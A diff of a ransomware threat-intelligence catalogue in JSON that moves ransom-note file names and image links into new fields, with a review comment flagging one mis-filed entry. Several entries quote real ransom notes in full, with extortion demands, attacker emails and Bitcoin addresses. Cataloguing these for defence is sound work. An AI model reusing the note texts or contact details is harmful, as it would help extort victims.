 "https://4.bp.blogspot.com/--7M0dtKhOio/WBxJx1PflYI/AAAAAAAAB-g/DSdMjLDLnVwwaMBW4H_98SzSJupLYm9WgCLcB/s1600/note_2.PNG"
 ],
 "refs": [
@@ -3986,10 +4118,12 @@
 ],
 "payment-method": "Bitcoin",
 "price": "2",
- "ransomnotes": [
- "https://1.bp.blogspot.com/-1jyI1HoqJag/WBzj9SLvipI/AAAAAAAAB_U/_sp8TglWEPQphG8neqrztfUUIjcBbVhDwCLcB/s1600/kangaroo-lock_2.png",
+ "ransomnotes-filenames": [
 "filename.Instructions_Data_Recovery.txt"
 ],
+ "ransomnotes-refs": [
+ "https://1.bp.blogspot.com/-1jyI1HoqJag/WBzj9SLvipI/AAAAAAAAB_U/_sp8TglWEPQphG8neqrztfUUIjcBbVhDwCLcB/s1600/kangaroo-lock_2.png"
+ ],
 "refs": [
 "https://id-ransomware.blogspot.co.il/2016/11/kangaroo-ransomware.html",
 "https://www.bleepingcomputer.com/news/security/the-kangaroo-ransomware-not-only-encrypts-your-data-but-tries-to-lock-you-out-of-windows/"
@@ -4007,7 +4141,7 @@
 ".dCrypt"
 ],
 "payment-method": "Email",
- "ransomnotes": [
+ "ransomnotes-refs": [
 "https://4.bp.blogspot.com/-2rS0Yq27wp0/WBtKfupZ2sI/AAAAAAAAB8I/0MR-9Xx0n-0zV_NBSScDCiYTp1KH-edtACLcB/s1600/Lockscreen_2.png"
 ],
 "refs": [
@@ -4049,7 +4183,7 @@
 ".ace"
 ],
 "payment-method": "Website (onion)",
- "ransomnotes": [
+ "ransomnotes-refs": [
 "https://4.bp.blogspot.com/-zb0TP0wza7I/WBpShN0tCMI/AAAAAAAAB64/oTkSFwKFVx8hY1rEs5FQU6F7oaBW-LqHwCLcB/s1600/note_2.png"
 ],
 "refs": [
@@ -4089,7 +4223,7 @@
 ],
 "payment-method": "Bitcoin",
 "price": "10 (7300 $)",
- "ransomnotes": [
+ "ransomnotes-refs": [
 "https://1.bp.blogspot.com/-0AGEY4vAlA0/WBi_oChzFNI/AAAAAAAAB4w/8PrPRfFU30YFWCwHzqnsx4bYISVNFyesQCLcB/s1600/note.PNG"
 ],
 "refs": [
@@ -4115,9 +4249,11 @@
 "price": "7 (2000 - 5000 $)",
 "ransomnotes": [
 "Good day Your files were encrypted/locked As evidence can decrypt file 1 to 3 1-30MB The price of the transcripts of all the files on the server: 7 Bitcoin Recommend to solve the problem quickly and not to delay Also give advice on how to protect Your server against threats from the network (Files sql mdf backup decryption strictly after payment)!",
- "INFO.txt",
 "Для связи с нами используйте почту\ninkognitoman@tutamail.com\ninkognitoman@firemail.cc"
 ],
+ "ransomnotes-filenames": [
+ "INFO.txt"
+ ],
 "refs": [
 "https://id-ransomware.blogspot.co.il/2016/10/rotorcrypt-ransomware.html",
 "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-october-12th-2018-notpetya-gandcrab-and-more/",
@@ -4162,10 +4298,14 @@
 "payment-method": "rupies",
 "price": "3500 - 5000 - 10 000",
 "ransomnotes": [
- "IMPORTANT!!!! All of your computer files have been encrypted. DO NOT CHANGE ANY FILES! We can restore all the files. How to restore files: - \n1) Follow this link: - http://goo.gl/forms/VftoBRppkJ \n2) Fill out the form above. \n3) For 24 hours on your email + mobile SMS will come instructions for solving the problem. Thank you! DarkWing020",
- "https://3.bp.blogspot.com/-gqEyoqXbZnE/WBXoF5bPZZI/AAAAAAAAB2U/YGpgIdjXyQQeDnwc9PlJs37YWtWTnH_wgCLcB/s1600/note.jpg",
+ "IMPORTANT!!!! All of your computer files have been encrypted. DO NOT CHANGE ANY FILES! We can restore all the files. How to restore files: - \n1) Follow this link: - http://goo.gl/forms/VftoBRppkJ \n2) Fill out the form above. \n3) For 24 hours on your email + mobile SMS will come instructions for solving the problem. Thank you! DarkWing020"
+ ],
+ "ransomnotes-filenames": [
 "CreatesReadThisFileImportant.txt"
 ],
+ "ransomnotes-refs": [
+ "https://3.bp.blogspot.com/-gqEyoqXbZnE/WBXoF5bPZZI/AAAAAAAAB2U/YGpgIdjXyQQeDnwc9PlJs37YWtWTnH_wgCLcB/s1600/note.jpg"
+ ],
 "refs": [
 "https://id-ransomware.blogspot.co.il/2016/10/masterbuster-ransomware.html",
 "https://twitter.com/struppigel/status/791943837874651136"
@@ -4183,7 +4323,7 @@
 ],
 "payment-method": "Bitcoin",
 "price": "3",
- "ransomnotes": [
+ "ransomnotes-refs": [
 "https://3.bp.blogspot.com/-oaElZvUqbfo/WBUOGdD8unI/AAAAAAAAB1w/Ya1_qq0gfa09AhRddUITQNRxKloXgD_BwCLcB/s1600/wallp.jpg"
 ],
 "refs": [
@@ -4208,7 +4348,9 @@
 "payment-method": "Bitcoin",
 "price": "100 $",
 "ransomnotes": [
- "All your files are encrypted, but do not worry, they have not been removed. (for now) You have 24 hours to pay $100. Money move to the specified Bitcoin -account. Otherwise, all files will be destroyed. Do not turn off the computer and/or do not attempt to disable me. When disobedience will be deleted 100 files.",
+ "All your files are encrypted, but do not worry, they have not been removed. (for now) You have 24 hours to pay $100. Money move to the specified Bitcoin -account. Otherwise, all files will be destroyed. Do not turn off the computer and/or do not attempt to disable me. When disobedience will be deleted 100 files."
+ ],
+ "ransomnotes-refs": [
 "https://1.bp.blogspot.com/-cukkC4KAhZE/WBY1jJbcQoI/AAAAAAAAB3I/p8p-iNQRnQwnP6c6H77h_SHMQNAlkJ1CgCLcB/s1600/onyx.jpg"
 ],
 "refs": [
@@ -4230,7 +4372,7 @@
 ],
 "payment-method": "Bitcoin",
 "price": "1000 $",
- "ransomnotes": [
+ "ransomnotes-refs": [
 "https://4.bp.blogspot.com/-JuBZKpEHV0Q/WBYNHFlW7pI/AAAAAAAAB20/z0DPYA_8l6U8tB6pbgo8ZwyIJRcrIVy2ACLcB/s1600/Note1.JPG"
 ],
 "refs": [
@@ -4251,11 +4393,13 @@
 ".Alcatraz"
 ],
 "payment-method": "Email",
- "ransomnotes": [
- "https://3.bp.blogspot.com/-b0-Uvnz703Q/WBcMGkZqtwI/AAAAAAAAB3Y/a6clIjdp_tI2T-OE_ykyjvB2qNY3gqWdQCLcB/s1600/Screenshot_1.jpg",
- "https://2.bp.blogspot.com/-y5a6QnjAiv0/WBcMKV0zDDI/AAAAAAAAB3c/ytOQHJgmy30H_jEWPcfht7RRsh4NhcrvACLcB/s1600/Screenshot_2.jpg",
+ "ransomnotes-filenames": [
 "ransomed.hTmL"
 ],
+ "ransomnotes-refs": [
+ "https://3.bp.blogspot.com/-b0-Uvnz703Q/WBcMGkZqtwI/AAAAAAAAB3Y/a6clIjdp_tI2T-OE_ykyjvB2qNY3gqWdQCLcB/s1600/Screenshot_1.jpg",
+ "https://2.bp.blogspot.com/-y5a6QnjAiv0/WBcMKV0zDDI/AAAAAAAAB3c/ytOQHJgmy30H_jEWPcfht7RRsh4NhcrvACLcB/s1600/Screenshot_2.jpg"
+ ],
 "refs": [
 "https://id-ransomware.blogspot.co.il/2016/10/alcatraz-locker-ransomware.html",
 "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-november-4th-2016-cerber-paydos-alcatraz-locker-and-more/",
@@ -4275,7 +4419,9 @@
 ],
 "payment-method": "Email",
 "ransomnotes": [
- "Windows has encountered a critical problem and needs your immediate action to recover your data. The system access is locked and all the data have been encrypted to avoid the information be published or misused. You will not be able to access to your files and ignoring this message may cause the total loss of the data. We are sorry for the inconvenience. You need to contact the email below to restore the data of your system. Email: esmeraldaencryption@mail.ru You will have to order the Unlock-Password and the Esmeralda Decryption Software. All the instructions will be sent to you by email.",
+ "Windows has encountered a critical problem and needs your immediate action to recover your data. The system access is locked and all the data have been encrypted to avoid the information be published or misused. You will not be able to access to your files and ignoring this message may cause the total loss of the data. We are sorry for the inconvenience. You need to contact the email below to restore the data of your system. Email: esmeraldaencryption@mail.ru You will have to order the Unlock-Password and the Esmeralda Decryption Software. All the instructions will be sent to you by email."
+ ],
+ "ransomnotes-refs": [
 "https://2.bp.blogspot.com/-vaWu8OjSiXE/WBzkLBdB8DI/AAAAAAAAB_Y/k8vvtYEIdTkFJhruRJ6qDNAujAn4Ph-xACLcB/s1600/esmeralda-lock_2.png"
 ],
 "refs": [
@@ -4296,7 +4442,7 @@
 ],
 "payment-method": "Bitcoin",
 "price": "0.053773",
- "ransomnotes": [
+ "ransomnotes-refs": [
 "https://2.bp.blogspot.com/-_jxt6kCRnwM/WBNf7mi92nI/AAAAAAAAB0g/homx8Ly379oUKAOIhZU6MxCiWX1gA_TkACLcB/s1600/wallp.jpg"
 ],
 "refs": [
@@ -4315,7 +4461,7 @@
 ".encrypted"
 ],
 "payment-method": "Game",
- "ransomnotes": [
+ "ransomnotes-refs": [
 "https://3.bp.blogspot.com/-GAPCc3ITdQY/WBMTmJ4NaRI/AAAAAAAABzM/XPbPZvZ8vbUrOWxtwPmfHFJiNT_2gfaOgCLcB/s1600/fileice-source.png"
 ],
 "refs": [
@@ -4336,7 +4482,7 @@
 ],
 "payment-method": "Bitcoin",
 "price": "0.29499335",
- "ransomnotes": [
+ "ransomnotes-refs": [
 "https://4.bp.blogspot.com/-vIMgkn8WVJM/WBJAxkbya7I/AAAAAAAABys/tCpaTOxfGDw8A611gudDh46mhZT70dURwCLcB/s1600/lock-screen.jpg",
 "https://1.bp.blogspot.com/-b0QiEQec0Pg/WBMf2HG6hjI/AAAAAAAABz8/BtN2-INZ2KQ4W2_iPqvDZTtlA0Aq_4gVACLcB/s1600/Screenshot_2.jpg"
 ],
@@ -4360,11 +4506,15 @@ ], "payment-method": "Email", "ransomnotes": [ - "https://1.bp.blogspot.com/-lLZZBScC27U/WBmkDQzl9FI/AAAAAAAAB5Y/gozOy17Yv0EWNCQVSOXn-PkTccYZuMmPQCLcB/s1600/note-bmp_2.png", - "!!! IMPORTANT INFORMATION !!!! All files are encrypted using RSA-3072 and AES128 encryption. You can learn more about RSA and AES ciphers here: Https://hu.wikipedia.org/wiki/RSA-eljárás Https://hu.wikipedia.org/wiki/Advanced_Encryption_Standard To return files, you need to get a secret key and decryption program. To get the key, please follow these steps: \n1. Send an identification code to the email address locky@mail2tor.com! If you want, send a 1 MB file for decryption. In order to prove that we can recover data. (Please, email must contain only the identification code, as well as the attachment) \n3. Please note, check the mail, we will send you an email within 24 hours! You will receive a decrypted file and decryption program in the attachment. Follow the instructions in the email.!!! Your identification code !!!", + "!!! IMPORTANT INFORMATION !!!! All files are encrypted using RSA-3072 and AES128 encryption. You can learn more about RSA and AES ciphers here: Https://hu.wikipedia.org/wiki/RSA-eljárás Https://hu.wikipedia.org/wiki/Advanced_Encryption_Standard To return files, you need to get a secret key and decryption program. To get the key, please follow these steps: \n1. Send an identification code to the email address locky@mail2tor.com! If you want, send a 1 MB file for decryption. In order to prove that we can recover data. (Please, email must contain only the identification code, as well as the attachment) \n3. Please note, check the mail, we will send you an email within 24 hours! You will receive a decrypted file and decryption program in the attachment. Follow the instructions in the email.!!! Your identification code !!!" 
+ ],
+ "ransomnotes-filenames": [
 "_Adatok_visszaallitasahoz_utasitasok.txt",
 "_locky_recover_instructions.txt"
 ],
+ "ransomnotes-refs": [
+ "https://1.bp.blogspot.com/-lLZZBScC27U/WBmkDQzl9FI/AAAAAAAAB5Y/gozOy17Yv0EWNCQVSOXn-PkTccYZuMmPQCLcB/s1600/note-bmp_2.png"
+ ],
 "refs": [
 "https://id-ransomware.blogspot.co.il/2016/10/hucky-ransomware-hungarian-locky.html",
 "https://blog.avast.com/hucky-ransomware-a-hungarian-locky-wannabe",
@@ -4388,7 +4538,9 @@ "payment-method": "Bitcoin", "price": "2 - 4", "ransomnotes": [ - "Your files are encrypted! Your files have been safely encrypted on this PC: photos, documents, databases, etc. Encryption was produced using a unique public key generated for this computer. To decrypt files you need to obtain the private key. The only way to get the private key is to pay 4 BTC. You saved it on qualified system administrator who could make your network safe and secure. In order to decrypt the files send your bitcoins to the following address: 13gYXFxpzm7hAd4esdnJGt9JvYqyD1Y6by After you complete your payment, send an email to 6214ssxpvo@sigaint.org with YOUR ID as subject (ID is in the end of the file) and you'll receive private key, needed software and step by step guide in 1 business day. Offer is valid for 5 business days (expiration date is in the end of the file). AFTER TIME IS UP, PRICE DOUBLES. No discounts, no other payment methods. How to buy bitcoins? \n1. Create a Bitcoin Wallet (we recommend Blockchain.info) \n2. Buy necessary amount of Bitcoins Do not forget about the transaction commission in the Bitcoin network (= 0.0005). Here are our recommendations: LocalBitcoins.com – the fastest and easiest way to buy and sell Bitcoins; CoinCafe.com – the simplest and fastest way to buy, sell and use Bitcoins; BTCDirect.eu – the best for Europe; CEX.IO – Visa / MasterCard; CoinMama.com – Visa / MasterCard; HowToBuyBitcoins.info – discover quickly how to buy and sell bitcoins in your local currency. More questions? Send an email to 6214ssxpvo@sigaint.org ID: *** EXP DATE: Sept. 12 2016 Winnix Cryptor Team", + "Your files are encrypted! Your files have been safely encrypted on this PC: photos, documents, databases, etc. Encryption was produced using a unique public key generated for this computer. To decrypt files you need to obtain the private key. The only way to get the private key is to pay 4 BTC. 
You saved it on qualified system administrator who could make your network safe and secure. In order to decrypt the files send your bitcoins to the following address: 13gYXFxpzm7hAd4esdnJGt9JvYqyD1Y6by After you complete your payment, send an email to 6214ssxpvo@sigaint.org with YOUR ID as subject (ID is in the end of the file) and you'll receive private key, needed software and step by step guide in 1 business day. Offer is valid for 5 business days (expiration date is in the end of the file). AFTER TIME IS UP, PRICE DOUBLES. No discounts, no other payment methods. How to buy bitcoins? \n1. Create a Bitcoin Wallet (we recommend Blockchain.info) \n2. Buy necessary amount of Bitcoins Do not forget about the transaction commission in the Bitcoin network (= 0.0005). Here are our recommendations: LocalBitcoins.com – the fastest and easiest way to buy and sell Bitcoins; CoinCafe.com – the simplest and fastest way to buy, sell and use Bitcoins; BTCDirect.eu – the best for Europe; CEX.IO – Visa / MasterCard; CoinMama.com – Visa / MasterCard; HowToBuyBitcoins.info – discover quickly how to buy and sell bitcoins in your local currency. More questions? Send an email to 6214ssxpvo@sigaint.org ID: *** EXP DATE: Sept. 12 2016 Winnix Cryptor Team" + ], + "ransomnotes-filenames": [ "YOUR FILES ARE ENCRYPTED!.txt" ], "refs": [ 
@@ -4410,9 +4562,11 @@ "payment-method": "Bitcoin", "price": "10 (7300 $)", "ransomnotes": [ - "https://3.bp.blogspot.com/-k3s85Fx9N_E/WBIfuUNTMmI/AAAAAAAAByM/rQ10tKuXTlEJfLTOoBwJPo7rhhaiK2OoQCLcB/s1600/screen-lock.jpg", "ANGRY DUCK! All your important files have been encrypted using very string cryptography (AES-512 With RSA-64 FIPS grade encryption). To recover your files, send 10 BTC to my private wallet DON'T MESS WITH THE DUCKS!!!" ], + "ransomnotes-refs": [ + "https://3.bp.blogspot.com/-k3s85Fx9N_E/WBIfuUNTMmI/AAAAAAAAByM/rQ10tKuXTlEJfLTOoBwJPo7rhhaiK2OoQCLcB/s1600/screen-lock.jpg" + ], "refs": [ "https://id-ransomware.blogspot.co.il/2016/10/angryduck-ransomware.html", "https://twitter.com/demonslay335/status/790334746488365057" @@ -4431,7 +4585,7 @@ ], "payment-method": "Email", "price": "1000 rubles", - "ransomnotes": [ + "ransomnotes-refs": [ "https://3.bp.blogspot.com/-WuD2qaaNIb0/WA4_g_FnIfI/AAAAAAAABx4/pn6VNqMXMzI_ryvKUruY3ctYtzomT1I4gCLcB/s1600/note3.jpg", "https://1.bp.blogspot.com/-S6M83oFxSdM/WA4_ak9WATI/AAAAAAAABx0/3FL3q21FdxMQvAgrr2FORQIaNtq2-P2jACLcB/s1600/note2.jpg" ], @@ -4450,10 +4604,12 @@ "encryption": "AES-512", "payment-method": "Bitcoin", "price": "0.25 - 0.5", - "ransomnotes": [ - "https://2.bp.blogspot.com/-5gZpxeEWqZg/WBeNnEP9GzI/AAAAAAAAB4g/ELCCp88whLMI6CzpGTjlxbmXBMFIKhwtwCLcB/s1600/onion-site.JPG", + "ransomnotes-filenames": [ "!!!!!readme!!!!!.htm" ], + "ransomnotes-refs": [ + "https://2.bp.blogspot.com/-5gZpxeEWqZg/WBeNnEP9GzI/AAAAAAAAB4g/ELCCp88whLMI6CzpGTjlxbmXBMFIKhwtwCLcB/s1600/onion-site.JPG" + ], "refs": [ "https://id-ransomware.blogspot.co.il/2016/10/asn1-encoder-ransomware.html", "https://malwarebreakdown.com/2017/03/02/rig-ek-at-92-53-105-43-drops-asn1-ransomware/" @@ -4492,7 +4648,7 @@ ], "payment-method": "Bitcoin", "price": "0.5", - "ransomnotes": [ + "ransomnotes-refs": [ "https://2.bp.blogspot.com/-4HNc9S8SY4I/WBMkpdKyDsI/AAAAAAAAB0I/udESgro7YB4pF98Dv2KrrecyymFGsvV2QCLcB/s1600/note.JPG" ], "refs": [ 
@@ -4511,7 +4667,7 @@ "#LOCK#" ], "payment-method": "Email", - "ransomnotes": [ + "ransomnotes-refs": [ "https://2.bp.blogspot.com/-sdlDK4OIuPA/WAehWZYHaMI/AAAAAAAABvc/TcAcLG2lw10aOFY3FbP1A5EuLjL6LR62ACLcB/s1600/note.jpg" ], "refs": [ @@ -4539,10 +4695,12 @@ ], "payment-method": "Bitcoin", "price": "1 - 2.5 - 3", - "ransomnotes": [ - "https://4.bp.blogspot.com/-0YMsPH5WuTk/WAepI4BnqZI/AAAAAAAABv0/yXt4tdrmmAIf-N9KUmehY6mK1kTV-eFFQCLcB/s1600/note-wal2.jpg", + "ransomnotes-filenames": [ "Decryption Instructions.txt" ], + "ransomnotes-refs": [ + "https://4.bp.blogspot.com/-0YMsPH5WuTk/WAepI4BnqZI/AAAAAAAABv0/yXt4tdrmmAIf-N9KUmehY6mK1kTV-eFFQCLcB/s1600/note-wal2.jpg" + ], "refs": [ "https://id-ransomware.blogspot.co.il/2016/10/anubis-ransomware.html", "http://nyxbone.com/malware/Anubis.html" @@ -4558,7 +4716,7 @@ "encryption": "AES-256", "payment-method": "Bitcoin", "price": "2", - "ransomnotes": [ + "ransomnotes-filenames": [ "Attention! ! ! All of your copies of your system have been permanently deleted and the data on all partitions and workstations have been encrypted! Stay calm. You can recover all your data by making a payment of 2 BTC (1200 USD) in Bitcoin currency to receive a decryption key. To purchase Bitcions you can use www.coinbase.com After buying BTC send the equivalent of 2 BTC (1200 USD) to our BTC adress : 16jX5RbF2pEcLYHPukazWhDCkxXTs7ZCxB After payment contact us to receive your decryption key. In mail title write your unique ID: {custom id visually resembling a MAC address} Our e-mail: crypt302@gmx.com" ], "refs": [ 
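Review bot: The hunk at `@@ -4558` renames the key to `ransomnotes-filenames`, but its single value is the ransom note's text (`"Attention! ! ! All of your copies of your system have been permanently deleted ..."`), not a file name, so after this commit a consumer treating the list as file names receives a paragraph-long string. Every other hunk in this series keeps note text under `ransomnotes` and moves only file names and URLs, so this one looks like a mis-classification rather than an intended rule. The fix is to drop the rename here and leave `"ransomnotes": [` for this entry.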
@@ -4579,7 +4737,7 @@ ], "payment-method": "Bitcoin", "price": "50 $", - "ransomnotes": [ + "ransomnotes-refs": [ "https://4.bp.blogspot.com/-WJYR7LkWHWY/WAaCYScljOI/AAAAAAAABuo/j18AGhzv7WUPb2r4HWkYm4TPgYw9S5PUwCLcB/s1600/note1-1.jpg", "https://4.bp.blogspot.com/-2QxJ3KCRimI/WAaCcWcE2uI/AAAAAAAABus/9SGRY5iQT-ITfG_JrY7mn6-PUpQrSKg7gCLcB/s1600/note1-2.jpg", "https://3.bp.blogspot.com/-SMXOoWiGkxw/WAaGOMdecrI/AAAAAAAABu8/S-YjlWlPKbItSN_fe8030tMDHWzouHsIgCLcB/s1600/note2.jpg" @@ -4604,7 +4762,7 @@ ], "payment-method": "Bitcoin", "price": "1", - "ransomnotes": [ + "ransomnotes-refs": [ "https://2.bp.blogspot.com/-VTUhk_Py2FA/WAVCO1Yn69I/AAAAAAAABuI/N71wo2ViOE0UjrIdbeulBRTJukHtA2TdACLcB/s1600/ransom-note.jpg" ], "refs": [ @@ -4624,7 +4782,7 @@ ], "payment-method": "Bitcoin", "price": "0.0523", - "ransomnotes": [ + "ransomnotes-refs": [ "https://2.bp.blogspot.com/-NfRePJbfjbY/WAe5LHFsWaI/AAAAAAAABwE/1Pk116TDqAYEDYvnu2vzim1l-H5seW9mQCLcB/s1600/note.png" ], "refs": [ @@ -4659,7 +4817,7 @@ ], "payment-method": "Bitcoin", "price": "0.2", - "ransomnotes": [ + "ransomnotes-refs": [ "https://2.bp.blogspot.com/-k7T79DnBk8w/WBc67QXyjWI/AAAAAAAAB3w/QbA-E9lYdSMOg3PcG9Vz8fTc_OhmACObACLcB/s1600/note-html.jpg" ], "refs": [ @@ -4678,7 +4836,7 @@ ".venis" ], "payment-method": "Email", - "ransomnotes": [ + "ransomnotes-refs": [ "https://3.bp.blogspot.com/-IFEOWjw-aaQ/WAXTu9oEN4I/AAAAAAAABuY/APqBiaHn3pAX8404Noyuj7tnFJDf2m_XACLcB/s1600/note1.jpg" ], "refs": [ @@ -4717,7 +4875,7 @@ "encryption": "AES-256", "payment-method": "Bitcoin", "price": "500$", - "ransomnotes": [ + "ransomnotes-refs": [ "https://4.bp.blogspot.com/-XZiiaCYM9Bk/WAUsUkrCJEI/AAAAAAAABtk/z-sMHflz3Q8_aWc-K9PD0N5TGkSGwwQnACLcB/s1600/note-html.jpg" ], "refs": [ 
@@ -4741,7 +4899,7 @@ ], "payment-method": "Bitcoin", "price": "~2", - "ransomnotes": [ + "ransomnotes-refs": [ "https://3.bp.blogspot.com/-MmzOC__9qPA/V__t2kNX-SI/AAAAAAAABrc/t8ypPa1jCIUbPfvR7UGbdGzdvKrbAv_DgCLcB/s1600/wallpaper.jpg", "https://4.bp.blogspot.com/-hRoC-UFr-7o/V__tAEFuZWI/AAAAAAAABrQ/xDawlulx8Bg4uEtX4bU2ezPMY-x6iFiuQCLcB/s1600/note-1ch.JPG", "https://4.bp.blogspot.com/-PdYtm6sRHAI/WAEngHQBg_I/AAAAAAAABsA/nh8m7__b0wgviTEBahyNYK4HFhF1v7rOQCLcB/s1600/icon-stalin-2.jpg" @@ -4775,7 +4933,7 @@ ], "payment-method": "Bitcoin", "price": "0.8 - 1", - "ransomnotes": [ + "ransomnotes-refs": [ "https://3.bp.blogspot.com/-MYI30xhrcZU/V_qcDyASJsI/AAAAAAAABpU/Pej5jDk_baYBByLx1cXwFL8LBiT8Vj3xgCLcB/s1600/note22.jpg" ], "refs": [ @@ -4808,7 +4966,7 @@ ], "payment-method": "PaySafe", "price": "300 CZK - 2000 CZK after 12 hours", - "ransomnotes": [ + "ransomnotes-refs": [ "https://2.bp.blogspot.com/-E_MI2fT33J0/V_k_9Gjkj4I/AAAAAAAABpA/-30UT5HhPAAR9YtVkFwgrYqLIdWPprZ9gCLcB/s1600/lock-screen.jpg", "https://2.bp.blogspot.com/-4YmIkWfYfRA/V_lAALhfSvI/AAAAAAAABpE/Dj35aroKXSwbLXrSPqGCzbvhsTNHdsbAgCLcB/s1600/kostya.jpg" ], @@ -4830,7 +4988,7 @@ ], "payment-method": "Bitcoin", "price": "1.5", - "ransomnotes": [ + "ransomnotes-refs": [ "https://4.bp.blogspot.com/-nskzYgbg7Ac/V_jpJ3GApqI/AAAAAAAABos/EbG_-BLDPqA9bRVOWdzHjPnDWFiHYlsJwCLcB/s1600/ransom-note.png" ], "refs": [ @@ -4849,7 +5007,7 @@ ".ecrypt" ], "payment-method": "Tor WebSite", - "ransomnotes": [ + "ransomnotes-refs": [ "https://4.bp.blogspot.com/-E9WbSxLgaYs/WGn8gC6EfvI/AAAAAAAAC8A/bzd7uP9fcxU6Fyq1n6-9ZbUUGWlls9lrwCLcB/s1600/note-txt_2.png" ], "refs": [ @@ -4896,7 +5054,7 @@ ".enc" ], "payment-method": "Email", - "ransomnotes": [ + "ransomnotes-filenames": [ "YOUR_FILES_ARE_LOCKED.txt" ], "refs": [ @@ -4917,7 +5075,7 @@ ], "payment-method": "Bitcoin", "price": "0.1 (37$)", - "ransomnotes": [ + "ransomnotes-filenames": [ "read_this_file.txt" ], "refs": [ 
@@ -4939,7 +5097,7 @@ ], "payment-method": "Bitcoin", "price": "13 (4980$)", - "ransomnotes": [ + "ransomnotes-filenames": [ "FILES_BACK.txt" ], "refs": [ @@ -4970,7 +5128,7 @@ "extensions": [ ".8lock8" ], - "ransomnotes": [ + "ransomnotes-filenames": [ "READ_IT.txt" ], "refs": [ @@ -4987,7 +5145,7 @@ "._AiraCropEncrypted" ], "payment-method": "WebSite (onion) - Email", - "ransomnotes": [ + "ransomnotes-filenames": [ "How to decrypt your files.txt" ], "refs": [ @@ -5005,7 +5163,7 @@ ".disappeared" ], "payment-method": "Email", - "ransomnotes": [ + "ransomnotes-filenames": [ "Read_Me.Txt" ], "refs": [ @@ -5023,7 +5181,7 @@ ], "payment-method": "Bitcoin", "price": "1 (650$)", - "ransomnotes": [ + "ransomnotes-filenames": [ "README HOW TO DECRYPT YOUR FILES.HTML" ], "refs": [ @@ -5044,7 +5202,7 @@ ], "payment-method": "Bitcoin", "price": "1", - "ransomnotes": [ + "ransomnotes-filenames": [ "Unlock_files_randomx5.html" ], "refs": [ @@ -5065,7 +5223,7 @@ ], "payment-method": "Itunes Gift Cards", "price": "400$", - "ransomnotes": [ + "ransomnotes-filenames": [ "Read Me (How Decrypt) !!!!.txt" ], "refs": [ @@ -5097,7 +5255,7 @@ ], "payment-method": "Bitcoin", "price": "Depending on the victim’s situation", - "ransomnotes": [ + "ransomnotes-filenames": [ "ПРОЧТИ_МЕНЯ.txt", "READ_ME.txt" ], @@ -5117,7 +5275,7 @@ ], "payment-method": "Bitcoin", "price": "3", - "ransomnotes": [ + "ransomnotes-filenames": [ "READ_ME.txt" ], "refs": [ @@ -5155,7 +5313,7 @@ "*filename*.ID-[A-F0-9]{8}+countrycode[cryptcorp@inbox.ru].[a-z0-9]{13}" ], "payment-method": "Email - WebSite (onion)", - "ransomnotes": [ + "ransomnotes-filenames": [ "*.How_To_Decrypt.txt", "*.Contact_Here_To_Recover_Your_Files.txt", "*.Where_my_files.txt", @@ -5197,7 +5355,7 @@ ".locked" ], "payment-method": "Email - WebSite (onion)", - "ransomnotes": [ + "ransomnotes-filenames": [ "*.How_To_Get_Back.txt" ], "refs": [ 
@@ -5215,7 +5373,7 @@ ], "payment-method": "Bitcoin", "price": "0.5 - 1", - "ransomnotes": [ + "ransomnotes-filenames": [ "info.txt", "info.html" ], @@ -5244,7 +5402,7 @@ "meta": { "payment-method": "Bitcoin", "price": "2 (888,4$)", - "ransomnotes": [ + "ransomnotes-filenames": [ "Help Decrypt.html" ], "refs": [ @@ -5279,7 +5437,7 @@ ".id-[ID]_[EMAIL_ADDRESS]" ], "payment-method": "Email - Telegram", - "ransomnotes": [ + "ransomnotes-filenames": [ "HOW TO DECRYPT.txt" ], "refs": [ @@ -5312,7 +5470,7 @@ ], "payment-method": "Bitcoin", "price": "3", - "ransomnotes": [ + "ransomnotes-filenames": [ "recover.txt", "recover.bmp" ], @@ -5379,7 +5537,7 @@ ], "payment-method": "Bitcoin", "price": "0.07 (30$)", - "ransomnotes": [ + "ransomnotes-filenames": [ "Hacked_Read_me_to_decrypt_files.html", "YourID.txt" ], @@ -5443,7 +5601,7 @@ ], "payment-method": "Reais", "price": "2000 (543$)", - "ransomnotes": [ + "ransomnotes-filenames": [ "MENSAGEM.txt" ], "refs": [ @@ -5462,7 +5620,7 @@ ], "payment-method": "Bitcoin", "price": "1", - "ransomnotes": [ + "ransomnotes-filenames": [ "HOW_OPEN_FILES.html" ], "refs": [ @@ -5498,7 +5656,7 @@ ], "payment-method": "Bitcoin", "price": "0.5", - "ransomnotes": [ + "ransomnotes-filenames": [ "#_HOW_TO_FIX_!.hta" ], "refs": [ @@ -5528,7 +5686,7 @@ "extensions": [ "(.*).encoded.([A-Z0-9]{9})" ], - "ransomnotes": [ + "ransomnotes-filenames": [ "BUYUNLOCKCODE.txt" ], "refs": [ @@ -5546,7 +5704,7 @@ ], "payment-method": "Bitcoin", "price": "Variable / 0.3 - 1.2 / Double after 4 days and 4 hours", - "ransomnotes": [ + "ransomnotes-filenames": [ "!Recovery_[random_chars].html", "!Recovery_[random_chars].txt" ], @@ -5585,7 +5743,7 @@ ], "payment-method": "Bitcoin", "price": "1.24 / 2.48 after 7 days", - "ransomnotes": [ + "ransomnotes-filenames": [ "# DECRYPT MY FILES #.html", "# DECRYPT MY FILES #.txt", "# DECRYPT MY FILES #.vbs", 
@@ -5629,7 +5787,7 @@ ], "payment-method": "Bitcoin", "price": "0.939", - "ransomnotes": [ + "ransomnotes-filenames": [ "YOUR_FILES_ARE_ENCRYPTED.HTML", "YOUR_FILES_ARE_ENCRYPTED.TXT", ".gif" @@ -5662,7 +5820,7 @@ ], "payment-method": "Bitcoin", "price": "1", - "ransomnotes": [ + "ransomnotes-filenames": [ "wallpaper.jpg" ], "refs": [ @@ -5684,7 +5842,7 @@ ], "payment-method": "Bitcoin", "price": "1", - "ransomnotes": [ + "ransomnotes-filenames": [ "!!!-WARNING-!!!.html", "!!!-WARNING-!!!.txt" ], @@ -5732,7 +5890,7 @@ ], "payment-method": "Email", "price": "100$", - "ransomnotes": [ + "ransomnotes-refs": [ "http://virusinfo.info/showthread.php?t=185396" ], "refs": [ @@ -5752,7 +5910,7 @@ ], "payment-method": "Bitcoin", "price": "Variable / 0.3 - 1.2 / Double after 4 days and 4 hours", - "ransomnotes": [ + "ransomnotes-filenames": [ "!Recovery_[random_chars].html", "!Recovery_[random_chars].txt" ], @@ -5791,7 +5949,7 @@ "encryption": "AES-256", "payment-method": "Bitcoin", "price": "Variable / 0.3 - 1.2 / Double after 4 days and 4 hours", - "ransomnotes": [ + "ransomnotes-filenames": [ "README.TXT", "README.HTML", "README.BMP" @@ -5812,7 +5970,7 @@ 